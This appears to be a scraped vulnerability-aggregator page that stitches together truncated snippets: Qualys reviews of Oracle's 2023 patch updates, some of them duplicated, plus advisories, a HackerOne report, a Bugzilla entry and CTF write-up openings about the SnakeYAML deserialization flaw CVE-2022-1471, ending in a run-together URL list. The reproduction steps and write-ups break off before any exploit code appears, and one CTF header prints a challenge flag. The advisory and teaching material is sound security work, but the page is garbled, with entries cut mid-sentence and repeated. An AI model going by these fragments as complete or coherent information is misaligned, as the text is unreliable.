Qualys
Oracle Patch Tuesday, July 2023 Security Update Review
blogs_qualys·2023-07-19
Oracle Patch Tuesday, July 2023 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle has released its third quarterly edition of Critical Patch Update, which contains a group of patches for 508 security vulnerabilities. Some of the vulnerabilities addressed this month impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q3 2023 Oracle Critical Patch Update, the Oracle Financial Services Applications received the highest number of 147 patches, constituting 29% of the total patches released. Oracle Communications and Oracle Fusion Middleware followed, with
Qualys
Oracle Patch Tuesday, July 2023 Security Update Review | Qualys
blogs_qualys·2023-07-19
Oracle Patch Tuesday, July 2023 Security Update Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle has released its third quarterly edition of Critical Patch Update, which contains a group of patches for 508 security vulnerabilities. Some of the vulnerabilities addressed this month impact more than one product. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q3 2023 Oracle Critical Patch Update, the Oracle Financial Services Applications received the highest number of 147 patches, constituting 29% of the total patches released. Oracle Communications and Oracle Fusion Middleware followe
Qualys
Oracle Security Updates: Critical Patch April 2023 Advisory | Qualys
blogs_qualys·2023-04-19
Oracle Security Updates: Critical Patch April 2023 Advisory | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
- Rapid Response with Patch Management (PM)
Oracle has released the second quarterly edition of Critical Patch Update, which contains a group of patches for 433 security vulnerabilities. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q2 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 77, constituting 17% of the total patches released. The Oracle Financial Services Applications and Oracle Fusion Mi
Qualys
Oracle Patch Tuesday April 2023 Security Update Review
blogs_qualys·2023-04-19
Oracle Patch Tuesday April 2023 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Rapid Response with Patch Management (PM)
Oracle has released the second quarterly edition of Critical Patch Update, which contains a group of patches for 433 security vulnerabilities. Some of the vulnerabilities addressed this month impact various products. These patches address vulnerabilities in Oracle code and third-party components included in Oracle products.
During Q2 2023 Oracle Critical Patch Update, the Oracle Communications product suite recorded the highest number of patches at 77, constituting 17% of the total patches released. The Oracle Financial Services Applications and Oracle Fusion Middlewar
Greynoiseio
CVE-2022-1471: SnakeYAML Deserialization Deep Dive
blogs_greynoiseio·CVSS 8.3
[HIGH] CVE-2022-1471: SnakeYAML Deserialization Deep Dive
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Huntress
CVE-2022-1471 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 9.8
CVE-2022-1471 [CRITICAL] CVE-2022-1471 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2022-1471 Vulnerability
Published: 11/21/2025
Written by: Lizzie Danielson
## What is CVE-2022-1471 vulnerability?
CVE-2022-1471 is a critical remote code execution (RCE) vulnerability found in the SnakeYAML library, a popular YAML parsing tool used in multiple software products. This vulnerability enables malicious actors to execute arbitrary code by delivering specially crafted YAML content to affected systems. With a CVSS score of 9.8, CVE-2022-1471 poses a severe threat to confidentiality, integrity, and availability.
## When was It discovered?
CVE-2022-1471 was publicly disclosed on April 4, 2022. The vulnerability was identified by security researchers investigating unsafe deserialization practices within SnakeYAML's parsing process. The vendor acted promptly, releasing
HackerOne
The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
hackerone·2023-04-25·CVSS 6.7
[MEDIUM] The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML
## Summary:
If the `io.kubernetes.client.util.generic.dynamic.Dynamics` is used to deserialize a `DynamicKubernetesObject `from untrusted YAML, an attacker can achieve code execution inside of the JVM.
Since this is a part of the public API, down stream consumers can be using this API in a way that leaves them vulnerable. I have found no users of this class on GitHub outside of this project's unit tests. But that doesn't mean there are no users of this API. Someone built it for a reason, right?
## Component Version:
Kubernettes Java Client version 17.0.0
## Steps To Reproduce:
1. Host a server with a JAR file containing the following code:
```java
package org.jlleitschuh
Bugzilla
CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
bugzilla·2022-12-01·CVSS 9.8
CVE-2022-1471 [CRITICAL] CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.
Discussion:
This issue has been addressed in the following products:
Red Hat build of Eclipse Vert.x 4.3.4
Via RHSA-2022:9032 https://access.redhat.com/errata/RHSA-2022:9032
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 8
Via RHSA-2022:9058 https://access.redhat.com/errata/RHSA-2022:9058
---
Hello, when can we expect to see an update for Rhel 8.6 EUS since the rating is "I
CTF
remedyctf / healthcheck
ctf_writeups·2025
remedyctf / healthcheck
# HealthCheck as a Service: SnakeYAML Deserialization Leading to Remote Code Execution
In this CTF challenge, we explore a vulnerability in a Spring Boot health check service that processes YAML configurations. The challenge demonstrates how insufficient input validation combined with an outdated SnakeYAML library can lead to remote code execution through YAML deserialization.
## Challenge Overview
The challenge presents us with a Spring Boot web service that performs database health checks where:
- Users can submit database configurations in YAML format
- The service attempts to validate and parse the YAML input
- The parsed configuration is used to test database connectivity
- A simple input validation mechanism blocks certain suspicious keywords
The system implements some standard s
CTF
Watersnake / README
ctf_writeups·2023·CVSS 8.3
[HIGH] Watersnake / README
# Watersnake
> As the United Nations of Zenium and the Board of Arodor engage in a fierce competition to establish a colony on Mars using Vitalium. State hackers from UNZ identify an exposed instance of the critical facility water management software, Watersnakev3, in one of Arodor's main water treatment plants. The objective is to gain control over the water supply, and weaken the Arodor's infrastructure.
## About the Challenge
We were given a source code (You can download the source code [here](web_watersnake.zip)). Here is the preview of the website
And also there is another functionality where we can submit our own YAML configuration
## How to Solve?
If we check the the `Controller.java` code especially a function called `update()`
```java
import org.yaml.snakeyaml.Yaml;
...
...
CTF
HackyEaster_2023 / level7-4-digital-snake-art
ctf_writeups·2023
HackyEaster_2023 / level7-4-digital-snake-art
---
layout: writeup
title: Digital Snake Art
level: 7 # optional, for events that use levels (like HackyEaster)
difficulty: medium # easy/medium/hard etc, if applicable
points: 200 # if used
categories: [web] # e.g. crypto, pwn, reversing
tags: [java, yaml, deserialisation] # anything notable about challenge/solution, vuln/tools/etc
flag: he2023{0n3_d03s_n0t_s1mply_s0lv3_th1s_chllng!}
---
## Challenge
I'm a big fan of digital art!
How do you like my new gallery?
http://ch.hackyeaster.com:2307
[digitalsnakeart.zip](writeupfiles/digitalsnakeart.zip)
Note: The service is restarted every hour at x:00.
## Solution
The website is a set of images generated by DALL-E
and e.g. the "Snakes in space" page looks like:
and has an url like:
```
http://ch.hackyeaster.com:2307/art?art=bmF
http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.htmlhttp://www.openwall.com/lists/oss-security/2023/11/19/1https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.htmlhttps://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2https://github.com/mbechler/marshalsechttps://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnchttps://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4chttps://security.netapp.com/advisory/ntap-20230818-0015/https://security.netapp.com/advisory/ntap-20240621-0006/https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=truehttp://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.htmlhttp://www.openwall.com/lists/oss-security/2023/11/19/1https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2https://github.com/mbechler/marshalsechttps://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnchttps://security.netapp.com/advisory/ntap-20230818-0015/https://security.netapp.com/advisory/ntap-20240621-0006/https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true
2022-12-01
Published